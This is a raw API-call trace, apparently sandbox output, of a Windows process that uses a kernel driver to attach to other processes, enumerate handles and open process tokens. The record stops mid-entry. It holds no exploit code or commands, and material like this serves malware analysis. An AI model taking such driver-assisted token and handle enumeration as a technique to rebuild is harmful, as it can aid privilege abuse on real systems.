DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.094] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.094] PsAcquireProcessExitSynchronization () returned 0x0 [0156.094] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0) [0156.094] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020a9f20, HandleInformation=0x0) returned 0x0 [0156.094] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.094] PsReleaseProcessExitSynchronization () returned 0x2 [0156.094] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0156.094] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff6044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.095] ObfDereferenceObject (Object=0xfffffa80020a9f20) returned 0x1 [0156.095] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.095] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.095] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.095] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0156.095] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.095] PsAcquireProcessExitSynchronization () returned 0x0 [0156.095] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0) [0156.095] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020a8070, HandleInformation=0x0) returned 0x0 [0156.095] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.095] PsReleaseProcessExitSynchronization () returned 0x2 [0156.095] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0156.095] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030bf044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030bf044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.095] ObfDereferenceObject (Object=0xfffffa80020a8070) returned 0x1 [0156.095] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.095] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.095] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.095] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.096] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.096] PsAcquireProcessExitSynchronization () returned 0x0 [0156.096] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880051635d0) [0156.096] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.096] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.096] PsReleaseProcessExitSynchronization () returned 0x2 [0156.096] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0156.096] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.096] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.096] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.096] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xc8 [0156.096] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.096] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fc5b30, HandleInformation=0x0) returned 0x0 [0156.096] ObOpenObjectByPointer (in: Object=0xfffffa8001fc5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.096] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x14 [0156.096] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.096] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.096] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.097] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.097] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.099] CloseHandle (hObject=0xc4) returned 1 [0156.099] CloseHandle (hObject=0xc8) returned 1 [0156.099] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.099] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.099] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.099] PsAcquireProcessExitSynchronization () returned 0x0 [0156.099] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0) [0156.099] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f9fdd0, HandleInformation=0x0) returned 0x0 [0156.099] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.099] PsReleaseProcessExitSynchronization () returned 0x2 [0156.099] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0156.099] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.099] ObfDereferenceObject (Object=0xfffffa8001f9fdd0) returned 0x1 [0156.100] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.100] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.100] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.100] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0156.100] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.100] PsAcquireProcessExitSynchronization () returned 0x0 [0156.100] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0) [0156.100] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eec7d0, HandleInformation=0x0) returned 0x0 [0156.100] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.100] PsReleaseProcessExitSynchronization () returned 0x2 [0156.100] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0156.100] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.100] ObfDereferenceObject (Object=0xfffffa8001eec7d0) returned 0x1 [0156.100] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.100] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.100] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.100] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.100] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.100] PsAcquireProcessExitSynchronization () returned 0x0 [0156.100] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880051635d0) [0156.101] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.101] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.101] PsReleaseProcessExitSynchronization () returned 0x2 [0156.101] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0156.101] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d5044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.101] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.101] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.101] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0xc8 [0156.101] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.101] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fe3b30, HandleInformation=0x0) returned 0x0 [0156.101] ObOpenObjectByPointer (in: Object=0xfffffa8001fe3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.101] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x14 [0156.101] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.101] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.101] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.101] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.102] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.103] CloseHandle (hObject=0xc4) returned 1 [0156.104] CloseHandle (hObject=0xc8) returned 1 [0156.104] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.104] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.104] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.104] PsAcquireProcessExitSynchronization () returned 0x0 [0156.104] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0) [0156.104] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fd9470, HandleInformation=0x0) returned 0x0 [0156.104] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.104] PsReleaseProcessExitSynchronization () returned 0x2 [0156.104] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0156.104] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.104] ObfDereferenceObject (Object=0xfffffa8001fd9470) returned 0x1 [0156.104] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.105] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.105] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.105] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0156.105] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.105] PsAcquireProcessExitSynchronization () returned 0x0 [0156.105] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0) [0156.105] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eaef20, HandleInformation=0x0) returned 0x0 [0156.105] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.105] PsReleaseProcessExitSynchronization () returned 0x2 [0156.105] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0156.105] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a02c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a02c4, ReturnLength=0xfffff88005163508) returned 0x0 [0156.105] ObfDereferenceObject (Object=0xfffffa8001eaef20) returned 0x1 [0156.105] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.105] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.105] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.105] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.105] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.105] PsAcquireProcessExitSynchronization () returned 0x0 [0156.106] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880051635d0) [0156.106] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.106] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.106] PsReleaseProcessExitSynchronization () returned 0x2 [0156.106] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0156.106] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ee5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee5044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.106] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.106] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.106] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x524) returned 0xc8 [0156.106] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.106] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001ff7950, HandleInformation=0x0) returned 0x0 [0156.106] ObOpenObjectByPointer (in: Object=0xfffffa8001ff7950, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.106] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x14 [0156.106] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.106] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.107] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.107] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.107] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.109] CloseHandle (hObject=0xc4) returned 1 [0156.109] CloseHandle (hObject=0xc8) returned 1 [0156.109] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.109] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.109] PsAcquireProcessExitSynchronization () returned 0x0 [0156.109] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0) [0156.110] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fed070, HandleInformation=0x0) returned 0x0 [0156.110] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.110] PsReleaseProcessExitSynchronization () returned 0x2 [0156.110] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0156.110] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.110] ObfDereferenceObject (Object=0xfffffa8001fed070) returned 0x1 [0156.110] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.110] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.110] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.110] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0156.110] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.110] PsAcquireProcessExitSynchronization () returned 0x0 [0156.110] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0) [0156.110] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fd8070, HandleInformation=0x0) returned 0x0 [0156.110] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.110] PsReleaseProcessExitSynchronization () returned 0x2 [0156.110] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0156.110] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.110] ObfDereferenceObject (Object=0xfffffa8001fd8070) returned 0x1 [0156.110] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.111] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.111] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.111] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.111] PsAcquireProcessExitSynchronization () returned 0x0 [0156.111] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880051635d0) [0156.111] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: 